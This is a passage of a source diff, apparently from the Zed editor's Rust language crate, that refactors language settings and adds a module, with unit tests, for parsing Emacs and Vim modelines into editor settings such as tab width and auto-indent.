smallvec::SmallVec; use std::{ - borrow::{Borrow, Cow}, cell::LazyCell, ffi::OsStr, ops::Not, @@ -33,91 +35,6 @@ use theme::Theme; use unicase::UniCase; use util::{ResultExt, maybe, post_inc}; -#[derive( - Debug, Clone, Hash, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize, JsonSchema, -)] -pub struct LanguageName(pub SharedString); - -impl LanguageName { - pub fn new(s: &str) -> Self { - Self(SharedString::new(s)) - } - - pub fn new_static(s: &'static str) -> Self { - Self(SharedString::new_static(s)) - } - - pub fn from_proto(s: String) -> Self { - Self(SharedString::from(s)) - } - - pub fn to_proto(&self) -> String { - self.0.to_string() - } - - pub fn lsp_id(&self) -> String { - match self.0.as_ref() { - "Plain Text" => "plaintext".to_string(), - language_name => language_name.to_lowercase(), - } - } -} - -impl From for SharedString { - fn from(value: LanguageName) -> Self { - value.0 - } -} - -impl From for LanguageName { - fn from(value: SharedString) -> Self { - LanguageName(value) - } -} - -impl AsRef for LanguageName { - fn as_ref(&self) -> &str { - self.0.as_ref() - } -} - -impl Borrow for LanguageName { - fn borrow(&self) -> &str { - self.0.as_ref() - } -} - -impl PartialEq for LanguageName { - fn eq(&self, other: &str) -> bool { - self.0.as_ref() == other - } -} - -impl PartialEq<&str> for LanguageName { - fn eq(&self, other: &&str) -> bool { - self.0.as_ref() == *other - } -} - -impl std::fmt::Display for LanguageName { - fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { - write!(f, "{}", self.0) - } -} - -impl From<&'static str> for LanguageName { - fn from(str: &'static str) -> Self { - Self(SharedString::new_static(str)) - } -} - -impl From for String { - fn from(value: LanguageName) -> Self { - let value: &str = &value.0; - Self::from(value) - } -} - pub struct LanguageRegistry { state: RwLock, language_server_download_dir: Option>, @@ -153,31 +70,6 @@ pub struct FakeLanguageServerEntry { pub _server: Option, } -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum LanguageServerStatusUpdate { - Binary(BinaryStatus), - Health(ServerHealth, Option), -} - -#[derive(Debug, PartialEq, Eq, Deserialize, Serialize, Clone, Copy)] -#[serde(rename_all = "camelCase")] -pub enum ServerHealth { - Ok, - Warning, - Error, -} - -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum BinaryStatus { - None, - CheckingForUpdate, - Downloading, - Starting, - Stopping, - Stopped, - Failed { error: String }, -} - #[derive(Clone)] pub struct AvailableLanguage { id: LanguageId, @@ -232,39 +124,6 @@ impl std::fmt::Display for LanguageNotFound { } } -pub const QUERY_FILENAME_PREFIXES: &[( - &str, - fn(&mut LanguageQueries) -> &mut Option>, -)] = &[ - ("highlights", |q| &mut q.highlights), - ("brackets", |q| &mut q.brackets), - ("outline", |q| &mut q.outline), - ("indents", |q| &mut q.indents), - ("injections", |q| &mut q.injections), - ("overrides", |q| &mut q.overrides), - ("redactions", |q| &mut q.redactions), - ("runnables", |q| &mut q.runnables), - ("debugger", |q| &mut q.debugger), - ("textobjects", |q| &mut q.text_objects), - ("imports", |q| &mut q.imports), -]; - -/// Tree-sitter language queries for a given language. -#[derive(Debug, Default)] -pub struct LanguageQueries { - pub highlights: Option>, - pub brackets: Option>, - pub indents: Option>, - pub outline: Option>, - pub injections: Option>, - pub overrides: Option>, - pub redactions: Option>, - pub runnables: Option>, - pub text_objects: Option>, - pub debugger: Option>, - pub imports: Option>, -} - #[derive(Clone, Default)] struct ServerStatusSender { txs: Arc>>>, @@ -745,6 +604,44 @@ impl LanguageRegistry { .cloned() } + /// Look up a language by its modeline name (vim filetype or emacs mode). + /// + /// This performs a case-insensitive match against: + /// 1. Explicit modeline aliases defined in the language config + /// 2. The language's grammar name + /// 3. The language name itself + pub fn available_language_for_modeline_name( + self: &Arc, + modeline_name: &str, + ) -> Option { + let modeline_name_lower = modeline_name.to_lowercase(); + let state = self.state.read(); + + state + .available_languages + .iter() + .find(|lang| { + lang.matcher + .modeline_aliases + .iter() + .any(|alias| alias.to_lowercase() == modeline_name_lower) + }) + .or_else(|| { + state.available_languages.iter().find(|lang| { + lang.grammar + .as_ref() + .is_some_and(|g| g.to_lowercase() == modeline_name_lower) + }) + }) + .or_else(|| { + state + .available_languages + .iter() + .find(|lang| lang.name.0.to_lowercase() == modeline_name_lower) + }) + .cloned() + } + pub fn language_for_file( self: &Arc, file: &Arc, @@ -1223,7 +1120,7 @@ impl LanguageRegistryState { LanguageSettingsContent { tab_size: language.config.tab_size, hard_tabs: language.config.hard_tabs, - soft_wrap: language.config.soft_wrap, + soft_wrap: language.config.soft_wrap.map(crate::to_settings_soft_wrap), auto_indent_on_paste: language.config.auto_indent_on_paste, ..Default::default() }, diff --git a/crates/language/src/language_settings.rs b/crates/language/src/language_settings.rs index 40e3da789d4785cc5fd56589b09735ba8592ebc7..986654e6fcd455ad2aa64bbd0a5548eeedd4afdd 100644 --- a/crates/language/src/language_settings.rs +++ b/crates/language/src/language_settings.rs @@ -1,6 +1,8 @@ //! Provides `language`-related settings. -use crate::{File, Language, LanguageName, LanguageServerName}; +use crate::{ + Buffer, BufferSnapshot, File, Language, LanguageName, LanguageServerName, ModelineSettings, +}; use collections::{FxHashMap, HashMap, HashSet}; use ec4rs::{ Properties as EditorconfigProperties, @@ -12,27 +14,15 @@ use itertools::{Either, Itertools}; use settings::{DocumentFoldingRanges, DocumentSymbols, IntoGpui, SemanticTokens}; pub use settings::{ - CompletionSettingsContent, EditPredictionPromptFormat, EditPredictionProvider, + AutoIndentMode, CompletionSettingsContent, EditPredictionPromptFormat, EditPredictionProvider, EditPredictionsMode, FormatOnSave, Formatter, FormatterList, InlayHintKind, LanguageSettingsContent, LspInsertMode, RewrapBehavior, ShowWhitespaceSetting, SoftWrap, WordsCompletionMode, }; -use settings::{RegisterSetting, Settings, SettingsLocation, SettingsStore}; +use settings::{RegisterSetting, Settings, SettingsLocation, SettingsStore, merge_from::MergeFrom}; use shellexpand; use std::{borrow::Cow, num::NonZeroU32, path::Path, sync::Arc}; - -/// Returns the settings for the specified language from the provided file. -pub fn language_settings<'a>( - language: Option, - file: Option<&'a Arc>, - cx: &'a App, -) -> Cow<'a, LanguageSettings> { - let location = file.map(|f| SettingsLocation { - worktree_id: f.worktree_id(cx), - path: f.path().as_ref(), - }); - AllLanguageSettings::get(location, cx).language(location, language.as_ref(), cx) -} +use text::ToOffset; /// Returns the settings for all languages from the provided file. pub fn all_language_settings<'a>( @@ -144,8 +134,8 @@ pub struct LanguageSettings { /// Whether to use additional LSP queries to format (and amend) the code after /// every "trigger" symbol input, defined by LSP server capabilities. pub use_on_type_format: bool, - /// Whether indentation should be adjusted based on the context whilst typing. - pub auto_indent: bool, + /// Controls automatic indentation behavior when typing. + pub auto_indent: AutoIndentMode, /// Whether indentation of pasted content should be adjusted based on the context. pub auto_indent_on_paste: bool, /// Controls how the editor handles the autoclosed characters. @@ -284,6 +274,74 @@ impl LanguageSettings { /// A token representing the rest of the available language servers. const REST_OF_LANGUAGE_SERVERS: &'static str = "..."; + pub fn for_buffer<'a>(buffer: &'a Buffer, cx: &'a App) -> Cow<'a, LanguageSettings> { + Self::resolve(Some(buffer), None, cx) + } + + pub fn for_buffer_at<'a, D: ToOffset>( + buffer: &'a Buffer, + position: D, + cx: &'a App, + ) -> Cow<'a, LanguageSettings> { + let language = buffer.language_at(position); + Self::resolve(Some(buffer), language.map(|l| l.name()).as_ref(), cx) + } + + pub fn for_buffer_snapshot<'a>( + buffer: &'a BufferSnapshot, + offset: Option, + cx: &'a App, + ) -> Cow<'a, LanguageSettings> { + let location = buffer.file().map(|f| SettingsLocation { + worktree_id: f.worktree_id(cx), + path: f.path().as_ref(), + }); + + let language = if let Some(offset) = offset { + buffer.language_at(offset) + } else { + buffer.language() + }; + + let mut settings = AllLanguageSettings::get(location, cx).language( + location, + language.map(|l| l.name()).as_ref(), + cx, + ); + + if let Some(modeline) = buffer.modeline() { + merge_with_modeline(settings.to_mut(), modeline); + } + + settings + } + + pub fn resolve<'a>( + buffer: Option<&'a Buffer>, + override_language: Option<&LanguageName>, + cx: &'a App, + ) -> Cow<'a, LanguageSettings> { + let Some(buffer) = buffer else { + return AllLanguageSettings::get(None, cx).language(None, override_language, cx); + }; + let location = buffer.file().map(|f| SettingsLocation { + worktree_id: f.worktree_id(cx), + path: f.path().as_ref(), + }); + let all = AllLanguageSettings::get(location, cx); + let mut settings = if override_language.is_none() { + all.language(location, buffer.language().map(|l| l.name()).as_ref(), cx) + } else { + all.language(location, override_language, cx) + }; + + if let Some(modeline) = buffer.modeline() { + merge_with_modeline(settings.to_mut(), modeline); + } + + settings + } + /// Returns the customized list of language servers from the list of /// available language servers. pub fn customized_language_servers( @@ -396,8 +454,7 @@ impl InlayHintSettings { } } -/// The settings for edit predictions, such as [GitHub Copilot](https://github.com/features/copilot) -/// or [Supermaven](https://supermaven.com). +/// The settings for edit predictions, such as [GitHub Copilot](https://github.com/features/copilot). #[derive(Clone, Debug, Default)] pub struct EditPredictionSettings { /// The provider that supplies edit predictions. @@ -412,14 +469,9 @@ pub struct EditPredictionSettings { pub copilot: CopilotSettings, /// Settings specific to Codestral. pub codestral: CodestralSettings, - /// Settings specific to Sweep. - pub sweep: SweepSettings, /// Settings specific to Ollama. pub ollama: Option, pub open_ai_compatible_api: Option, - /// Whether edit predictions are enabled in the assistant panel. - /// This setting has no effect if globally disabled. - pub enabled_in_text_threads: bool, pub examples_dir: Option>, } @@ -465,15 +517,6 @@ pub struct CodestralSettings { pub api_url: Option, } -#[derive(Clone, Debug, Default)] -pub struct SweepSettings { - /// When enabled, Sweep will not store edit prediction inputs or outputs. - /// When disabled, Sweep may collect data including buffer contents, - /// diagnostics, file paths, repository names, and generated predictions - /// to improve the service. - pub privacy_mode: bool, -} - #[derive(Clone, Debug, Default)] pub struct OpenAiCompatibleEditPredictionSettings { /// Model to use for completions. @@ -531,6 +574,42 @@ impl AllLanguageSettings { } } +fn merge_with_modeline(settings: &mut LanguageSettings, modeline: &ModelineSettings) { + let show_whitespaces = modeline.show_trailing_whitespace.and_then(|v| { + if v { + Some(ShowWhitespaceSetting::Trailing) + } else { + None + } + }); + + settings + .tab_size + .merge_from_option(modeline.tab_size.as_ref()); + settings + .hard_tabs + .merge_from_option(modeline.hard_tabs.as_ref()); + settings + .preferred_line_length + .merge_from_option(modeline.preferred_line_length.map(u32::from).as_ref()); + let auto_indent_mode = modeline.auto_indent.map(|enabled| { + if enabled { + AutoIndentMode::SyntaxAware + } else { + AutoIndentMode::None + } + }); + settings + .auto_indent + .merge_from_option(auto_indent_mode.as_ref()); + settings + .show_whitespaces + .merge_from_option(show_whitespaces.as_ref()); + settings + .ensure_final_newline_on_save + .merge_from_option(modeline.ensure_final_newline.as_ref()); +} + fn merge_with_editorconfig(settings: &mut LanguageSettings, cfg: &EditorconfigProperties) { let preferred_line_length = cfg.get::().ok().and_then(|v| match v { MaxLineLen::Value(u) => Some(u as u32), @@ -558,22 +637,18 @@ fn merge_with_editorconfig(settings: &mut LanguageSettings, cfg: &EditorconfigPr TrimTrailingWs::Value(b) => b, }) .ok(); - fn merge(target: &mut T, value: Option) { - if let Some(value) = value { - *target = value; - } - } - merge(&mut settings.preferred_line_length, preferred_line_length); - merge(&mut settings.tab_size, tab_size); - merge(&mut settings.hard_tabs, hard_tabs); - merge( - &mut settings.remove_trailing_whitespace_on_save, - remove_trailing_whitespace_on_save, - ); - merge( - &mut settings.ensure_final_newline_on_save, - ensure_final_newline_on_save, - ); + + settings + .preferred_line_length + .merge_from_option(preferred_line_length.as_ref()); + settings.tab_size.merge_from_option(tab_size.as_ref()); + settings.hard_tabs.merge_from_option(hard_tabs.as_ref()); + settings + .remove_trailing_whitespace_on_save + .merge_from_option(remove_trailing_whitespace_on_save.as_ref()); + settings + .ensure_final_newline_on_save + .merge_from_option(ensure_final_newline_on_save.as_ref()); } impl settings::Settings for AllLanguageSettings { @@ -716,10 +791,6 @@ impl settings::Settings for AllLanguageSettings { api_url: codestral.api_url, }; - let sweep = edit_predictions.sweep.unwrap(); - let sweep_settings = SweepSettings { - privacy_mode: sweep.privacy_mode.unwrap(), - }; let ollama = edit_predictions.ollama.unwrap(); let ollama_settings = ollama .model @@ -746,8 +817,6 @@ impl settings::Settings for AllLanguageSettings { prompt_format: openai_compatible_settings.prompt_format.unwrap(), }); - let enabled_in_text_threads = edit_predictions.enabled_in_text_threads.unwrap(); - let mut file_types: FxHashMap, (GlobSet, Vec)> = FxHashMap::default(); for (language, patterns) in all_languages.file_types.iter().flatten() { @@ -783,10 +852,8 @@ impl settings::Settings for AllLanguageSettings { mode: edit_predictions_mode, copilot: copilot_settings, codestral: codestral_settings, - sweep: sweep_settings, ollama: ollama_settings, open_ai_compatible_api: openai_compatible_settings, - enabled_in_text_threads, examples_dir: edit_predictions.examples_dir, }, defaults: default_language_settings, diff --git a/crates/language/src/manifest.rs b/crates/language/src/manifest.rs index 82ed164a032cb18d2d011f59938a0cd1410ba60f..a155ac28332e8b1d4f5a2c238e3622169787789c 100644 --- a/crates/language/src/manifest.rs +++ b/crates/language/src/manifest.rs @@ -1,43 +1,12 @@ -use std::{borrow::Borrow, sync::Arc}; +use std::sync::Arc; -use gpui::SharedString; use settings::WorktreeId; use util::rel_path::RelPath; -#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)] -pub struct ManifestName(SharedString); +// Re-export ManifestName from language_core. +pub use language_core::ManifestName; -impl Borrow for ManifestName { - fn borrow(&self) -> &SharedString { - &self.0 - } -} - -impl Borrow for ManifestName { - fn borrow(&self) -> &str { - &self.0 - } -} - -impl From for ManifestName { - fn from(value: SharedString) -> Self { - Self(value) - } -} - -impl From for SharedString { - fn from(value: ManifestName) -> Self { - value.0 - } -} - -impl AsRef for ManifestName { - fn as_ref(&self) -> &SharedString { - &self.0 - } -} - -/// Represents a manifest query; given a path to a file, [ManifestSearcher] is tasked with finding a path to the directory containing the manifest for that file. +/// Represents a manifest query; given a path to a file, the manifest provider is tasked with finding a path to the directory containing the manifest for that file. /// /// Since parts of the path might have already been explored, there's an additional `depth` parameter that indicates to what ancestry level a given path should be explored. /// For example, given a path like `foo/bar/baz`, a depth of 2 would explore `foo/bar/baz` and `foo/bar`, but not `foo`. diff --git a/crates/language/src/modeline.rs b/crates/language/src/modeline.rs new file mode 100644 index 0000000000000000000000000000000000000000..8b7e6044492fc64c5291a9d034466e1ec42a5ead --- /dev/null +++ b/crates/language/src/modeline.rs @@ -0,0 +1,763 @@ +use regex::Regex; +use std::{num::NonZeroU32, sync::LazyLock}; + +/// The settings extracted from an emacs/vim modelines. +/// +/// The parsing tries to best match the modeline directives and +/// variables to Zed, matching LanguageSettings fields. +/// The mode mapping is done later thanks to the LanguageRegistry. +/// +/// It is not exhaustive, but covers the most common settings. +#[derive(Debug, Clone, Default, PartialEq)] +pub struct ModelineSettings { + /// The emacs mode or vim filetype. + pub mode: Option, + /// How many columns a tab should occupy. + pub tab_size: Option, + /// Whether to indent lines using tab characters, as opposed to multiple + /// spaces. + pub hard_tabs: Option, + /// The number of bytes that comprise the indentation. + pub indent_size: Option, + /// Whether to auto-indent lines. + pub auto_indent: Option, + /// The column at which to soft-wrap lines. + pub preferred_line_length: Option, + /// Whether to ensure a final newline at the end of the file. + pub ensure_final_newline: Option, + /// Whether to show trailing whitespace on the editor. + pub show_trailing_whitespace: Option, + + /// Emacs modeline variables that were parsed but not mapped to Zed settings. + /// Stored as (variable-name, value) pairs. + pub emacs_extra_variables: Vec<(String, String)>, + /// Vim modeline options that were parsed but not mapped to Zed settings. + /// Stored as (option-name, value) pairs. + pub vim_extra_variables: Vec<(String, Option)>, +} + +impl ModelineSettings { + fn has_settings(&self) -> bool { + self != &Self::default() + } +} + +/// Parse modelines from file content. +/// +/// Supports: +/// - Emacs modelines: -*- mode: rust; tab-width: 4; indent-tabs-mode: nil; -*- and "Local Variables" +/// - Vim modelines: vim: set ft=rust ts=4 sw=4 et: +pub fn parse_modeline(first_lines: &[&str], last_lines: &[&str]) -> Option { + let mut settings = ModelineSettings::default(); + + parse_modelines(first_lines, &mut settings); + + // Parse Emacs Local Variables in last lines + parse_emacs_local_variables(last_lines, &mut settings); + + // Also check for vim modelines in last lines if we don't have settings yet + if !settings.has_settings() { + parse_vim_modelines(last_lines, &mut settings); + } + + Some(settings).filter(|s| s.has_settings()) +} + +fn parse_modelines(modelines: &[&str], settings: &mut ModelineSettings) { + for line in modelines { + parse_emacs_modeline(line, settings); + // if emacs is set, do not check for vim modelines + if settings.has_settings() { + return; + } + } + + parse_vim_modelines(modelines, settings); +} + +static EMACS_MODELINE_RE: LazyLock = + LazyLock::new(|| Regex::new(r"-\*-\s*(.+?)\s*-\*-").expect("valid regex")); + +/// Parse Emacs-style modelines +/// Format: -*- mode: rust; tab-width: 4; indent-tabs-mode: nil; -*- +/// See Emacs (set-auto-mode) +fn parse_emacs_modeline(line: &str, settings: &mut ModelineSettings) { + let Some(captures) = EMACS_MODELINE_RE.captures(line) else { + return; + }; + let Some(modeline_content) = captures.get(1).map(|m| m.as_str()) else { + return; + }; + for part in modeline_content.split(';') { + parse_emacs_key_value(part, settings, true); + } +} + +/// Parse Emacs-style Local Variables block +/// +/// Emacs supports a "Local Variables" block at the end of files: +/// ```text +/// /* Local Variables: */ +/// /* mode: c */ +/// /* tab-width: 4 */ +/// /* End: */ +/// ``` +/// +/// Emacs related code is hack-local-variables--find-variables in +/// https://cgit.git.savannah.gnu.org/cgit/emacs.git/tree/lisp/files.el#n4346 +fn parse_emacs_local_variables(lines: &[&str], settings: &mut ModelineSettings) { + const LOCAL_VARIABLES: &str = "Local Variables:"; + + let Some((start_idx, prefix, suffix)) = lines.iter().enumerate().find_map(|(i, line)| { + let prefix_len = line.find(LOCAL_VARIABLES)?; + let suffix_start = prefix_len + LOCAL_VARIABLES.len(); + Some((i, line.get(..prefix_len)?, line.get(suffix_start..)?)) + }) else { + return; + }; + + let mut continuation = String::new(); + + for line in &lines[start_idx + 1..] { + let Some(content) = line + .strip_prefix(prefix) + .and_then(|l| l.strip_suffix(suffix)) + .map(str::trim) + else { + return; + }; + + if let Some(continued) = content.strip_suffix('\\') { + continuation.push_str(continued); + continue; + } + + let to_parse = if continuation.is_empty() { + content + } else { + continuation.push_str(content); + &continuation + }; + + if to_parse == "End:" { + return; + } + + parse_emacs_key_value(to_parse, settings, false); + continuation.clear(); + } +} + +fn parse_emacs_key_value(part: &str, settings: &mut ModelineSettings, bare: bool) { + let part = part.trim(); + if part.is_empty() { + return; + } + + if let Some((key, value)) = part.split_once(':') { + let key = key.trim(); + let value = value.trim(); + + match key.to_lowercase().as_str() { + "mode" => { + settings.mode = Some(value.to_string()); + } + "c-basic-offset" | "python-indent-offset" => { + if let Ok(size) = value.parse::() { + settings.indent_size = Some(size); + } + } + "fill-column" => { + if let Ok(size) = value.parse::() { + settings.preferred_line_length = Some(size); + } + } + "tab-width" => { + if let Ok(size) = value.parse::() { + settings.tab_size = Some(size); + } + } + "indent-tabs-mode" => { + settings.hard_tabs = Some(value != "nil"); + } + "electric-indent-mode" => { + settings.auto_indent = Some(value != "nil"); + } + "require-final-newline" => { + settings.ensure_final_newline = Some(value != "nil"); + } + "show-trailing-whitespace" => { + settings.show_trailing_whitespace = Some(value != "nil"); + } + key => settings + .emacs_extra_variables + .push((key.to_string(), value.to_string())), + } + } else if bare { + // Handle bare mode specification (e.g., -*- rust -*-) + settings.mode = Some(part.to_string()); + } +} + +fn parse_vim_modelines(modelines: &[&str], settings: &mut ModelineSettings) { + for line in modelines { + parse_vim_modeline(line, settings); + } +} + +static VIM_MODELINE_PATTERNS: LazyLock> = LazyLock::new(|| { + [ + // Second form: [text{white}]{vi:vim:Vim:}[white]se[t] {options}:[text] + // Allow escaped colons in options: match non-colon chars or backslash followed by any char + r"(?:^|\s)(vi|vim|Vim):(?:\s*)se(?:t)?\s+((?:[^\\:]|\\.)*):", + // First form: [text{white}]{vi:vim:}[white]{options} + r"(?:^|\s+)(vi|vim):(?:\s*(.+))", + ] + .iter() + .map(|pattern| Regex::new(pattern).expect("valid regex")) + .collect() +}); + +/// Parse Vim-style modelines +/// Supports both forms: +/// 1. First form: vi:noai:sw=3 ts=6 +/// 2. Second form: vim: set ft=rust ts=4 sw=4 et: +fn parse_vim_modeline(line: &str, settings: &mut ModelineSettings) { + for re in VIM_MODELINE_PATTERNS.iter() { + if let Some(captures) = re.captures(line) { + if let Some(options) = captures.get(2) { + parse_vim_settings(options.as_str().trim(), settings); + break; + } + } + } +} + +fn parse_vim_settings(content: &str, settings: &mut ModelineSettings) { + fn split_colon_unescape(input: &str) -> Vec { + let mut split = Vec::new(); + let mut str = String::new(); + let mut chars = input.chars().peekable(); + while let Some(c) = chars.next() { + if c == '\\' { + match chars.next() { + Some(escaped_char) => str.push(escaped_char), + None => str.push('\\'), + } + } else if c == ':' { + split.push(std::mem::take(&mut str)); + } else { + str.push(c); + } + } + split.push(str); + split + } + + let parts = split_colon_unescape(content); + for colon_part in parts { + let colon_part = colon_part.trim(); + if colon_part.is_empty() { + continue; + } + + // Each colon part might contain space-separated options + for part in colon_part.split_whitespace() { + if let Some((key, value)) = part.split_once('=') { + match key { + "ft" | "filetype" => { + settings.mode = Some(value.to_string()); + } + "ts" | "tabstop" => { + if let Ok(size) = value.parse::() { + settings.tab_size = Some(size); + } + } + "sw" | "shiftwidth" => { + if let Ok(size) = value.parse::() { + settings.indent_size = Some(size); + } + } + "tw" | "textwidth" => { + if let Ok(size) = value.parse::() { + settings.preferred_line_length = Some(size); + } + } + _ => { + settings + .vim_extra_variables + .push((key.to_string(), Some(value.to_string()))); + } + } + } else { + match part { + "ai" | "autoindent" => { + settings.auto_indent = Some(true); + } + "noai" | "noautoindent" => { + settings.auto_indent = Some(false); + } + "et" | "expandtab" => { + settings.hard_tabs = Some(false); + } + "noet" | "noexpandtab" => { + settings.hard_tabs = Some(true); + } + "eol" | "endofline" => { + settings.ensure_final_newline = Some(true); + } + "noeol" | "noendofline" => { + settings.ensure_final_newline = Some(false); + } + "set" => { + // Ignore the "set" keyword itself + } + _ => { + settings.vim_extra_variables.push((part.to_string(), None)); + } + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use indoc::indoc; + use pretty_assertions::assert_eq; + + #[test] + fn test_no_modeline() { + let content = "This is just regular content\nwith no modeline"; + assert!(parse_modeline(&[content], &[content]).is_none()); + } + + #[test] + fn test_emacs_bare_mode() { + let content = "/* -*- rust -*- */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + ..Default::default() + } + ); + } + + #[test] + fn test_emacs_modeline_parsing() { + let content = "/* -*- mode: rust; tab-width: 4; indent-tabs-mode: nil; -*- */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + hard_tabs: Some(false), + ..Default::default() + } + ); + } + + #[test] + fn test_emacs_last_line_parsing() { + let content = indoc! {r#" + # Local Variables: + # compile-command: "cc foo.c -Dfoo=bar -Dhack=whatever \ + # -Dmumble=blaah" + # End: + "#} + .lines() + .collect::>(); + let settings = parse_modeline(&[], &content).unwrap(); + assert_eq!( + settings, + ModelineSettings { + emacs_extra_variables: vec![( + "compile-command".to_string(), + "\"cc foo.c -Dfoo=bar -Dhack=whatever -Dmumble=blaah\"".to_string() + ),], + ..Default::default() + } + ); + + let content = indoc! {" + foo + /* Local Variables: */ + /* eval: (font-lock-mode -1) */ + /* mode: old-c */ + /* mode: c */ + /* End: */ + /* mode: ignored */ + "} + .lines() + .collect::>(); + let settings = parse_modeline(&[], &content).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("c".to_string()), + emacs_extra_variables: vec![( + "eval".to_string(), + "(font-lock-mode -1)".to_string() + ),], + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_parsing() { + // Test second form (set format) + let content = "// vim: set ft=rust ts=4 sw=4 et:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + hard_tabs: Some(false), + indent_size: Some(NonZeroU32::new(4).unwrap()), + ..Default::default() + } + ); + + // Test first form (colon-separated) + let content = "vi:noai:sw=3:ts=6"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(6).unwrap()), + auto_indent: Some(false), + indent_size: Some(NonZeroU32::new(3).unwrap()), + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_first_form() { + // Examples from vim specification: vi:noai:sw=3 ts=6 + let content = " vi:noai:sw=3 ts=6 "; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(6).unwrap()), + auto_indent: Some(false), + indent_size: Some(NonZeroU32::new(3).unwrap()), + ..Default::default() + } + ); + + // Test with filetype + let content = "vim:ft=python:ts=8:noet"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("python".to_string()), + tab_size: Some(NonZeroU32::new(8).unwrap()), + hard_tabs: Some(true), + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_second_form() { + // Examples from vim specification: /* vim: set ai tw=75: */ + let content = "/* vim: set ai tw=75: */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + auto_indent: Some(true), + preferred_line_length: Some(NonZeroU32::new(75).unwrap()), + ..Default::default() + } + ); + + // Test with 'Vim:' (capital V) + let content = "/* Vim: set ai tw=75: */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + auto_indent: Some(true), + preferred_line_length: Some(NonZeroU32::new(75).unwrap()), + ..Default::default() + } + ); + + // Test 'se' shorthand + let content = "// vi: se ft=c ts=4:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("c".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + ..Default::default() + } + ); + + // Test complex modeline with encoding + let content = "# vim: set ft=python ts=4 sw=4 et encoding=utf-8:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("python".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + hard_tabs: Some(false), + indent_size: Some(NonZeroU32::new(4).unwrap()), + vim_extra_variables: vec![("encoding".to_string(), Some("utf-8".to_string()))], + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_edge_cases() { + // Test modeline at start of line (compatibility with version 3.0) + let content = "vi:ts=2:et"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(2).unwrap()), + hard_tabs: Some(false), + ..Default::default() + } + ); + + // Test vim at start of line + let content = "vim:ft=rust:noet"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + hard_tabs: Some(true), + ..Default::default() + } + ); + + // Test mixed boolean flags + let content = "vim: set wrap noet ts=8:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(8).unwrap()), + hard_tabs: Some(true), + vim_extra_variables: vec![("wrap".to_string(), None)], + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_invalid_cases() { + // Test malformed options are ignored gracefully + let content = "vim: set ts=invalid ft=rust:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + ..Default::default() + } + ); + + // Test empty modeline content - this should still work as there might be options + let content = "vim: set :"; + // This should return None because there are no actual options + let result = parse_modeline(&[content], &[]); + assert!(result.is_none(), "Expected None but got: {:?}", result); + + // Test modeline without proper format + let content = "not a modeline"; + assert!(parse_modeline(&[content], &[]).is_none()); + + // Test word that looks like modeline but isn't + let content = "example: this could be confused with ex:"; + assert!(parse_modeline(&[content], &[]).is_none()); + } + + #[test] + fn test_vim_language_mapping() { + // Test vim-specific language mappings + let content = "vim: set ft=sh:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("sh".to_string())); + + let content = "vim: set ft=golang:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("golang".to_string())); + + let content = "vim: set filetype=js:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("js".to_string())); + } + + #[test] + fn test_vim_extra_variables() { + // Test that unknown vim options are stored as extra variables + let content = "vim: set foldmethod=marker conceallevel=2 custom=value:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + + assert!( + settings + .vim_extra_variables + .contains(&("foldmethod".to_string(), Some("marker".to_string()))) + ); + assert!( + settings + .vim_extra_variables + .contains(&("conceallevel".to_string(), Some("2".to_string()))) + ); + assert!( + settings + .vim_extra_variables + .contains(&("custom".to_string(), Some("value".to_string()))) + ); + } + + #[test] + fn test_modeline_position() { + // Test modeline in first lines + let first_lines = ["#!/bin/bash", "# vim: set ft=bash ts=4:"]; + let settings = parse_modeline(&first_lines, &[]).unwrap(); + assert_eq!(settings.mode, Some("bash".to_string())); + + // Test modeline in last lines + let last_lines = ["", "/* vim: set ft=c: */"]; + let settings = parse_modeline(&[], &last_lines).unwrap(); + assert_eq!(settings.mode, Some("c".to_string())); + + // Test no modeline found + let content = ["regular content", "no modeline here"]; + assert!(parse_modeline(&content, &content).is_none()); + } + + #[test] + fn 